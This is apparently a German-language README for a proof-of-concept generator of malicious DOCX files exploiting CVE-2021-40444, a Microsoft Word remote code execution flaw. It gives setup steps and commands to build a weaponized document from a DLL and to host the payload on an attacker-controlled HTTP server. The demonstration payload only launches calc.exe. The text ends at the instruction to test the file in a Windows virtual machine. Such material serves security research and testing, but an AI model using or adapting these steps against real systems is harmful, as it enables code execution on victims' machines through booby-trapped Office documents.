
Generiert bösartige DOCX-Dokumente, die CVE-2021-40444 (Microsoft Office Word RCE) ausnutzen, mit integriertem HTTP-Server für die Payload-Zustellung und DLL-basierter calc-Ausführung.
Bösartiger docx-Generator zur Ausnutzung von CVE-2021-40444 (Microsoft Office Word Remote Code Execution)
Die Erstellung dieses Skripts basiert auf Reverse Engineering der in freier Wildbahn verwendeten Probe: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx-Datei)
Du musst zuerst lcab installieren (sudo apt-get install lcab)
Die manuellen Reproduktionsschritte findest du in REPRODUCE.md
Falls deine generierte cab-Datei nicht funktioniert, versuche, die URL in exploit.html auf calc.cab zu setzen.
Erzeuge zuerst ein bösartiges docx-Dokument mithilfe einer DLL. Du kannst die DLL unter test/calc.dll verwenden, die lediglich eine calc.exe über einen Aufruf von system() startet.
python3 exploit.py generate test/calc.dll http://<SRV IP>

Sobald du die bösartige docx-Datei generiert hast (sie liegt unter out/), kannst du den Server einrichten:
sudo python3 exploit.py host 80

Teste die docx-Datei schließlich auf einer virtuellen Windows-Maschine:
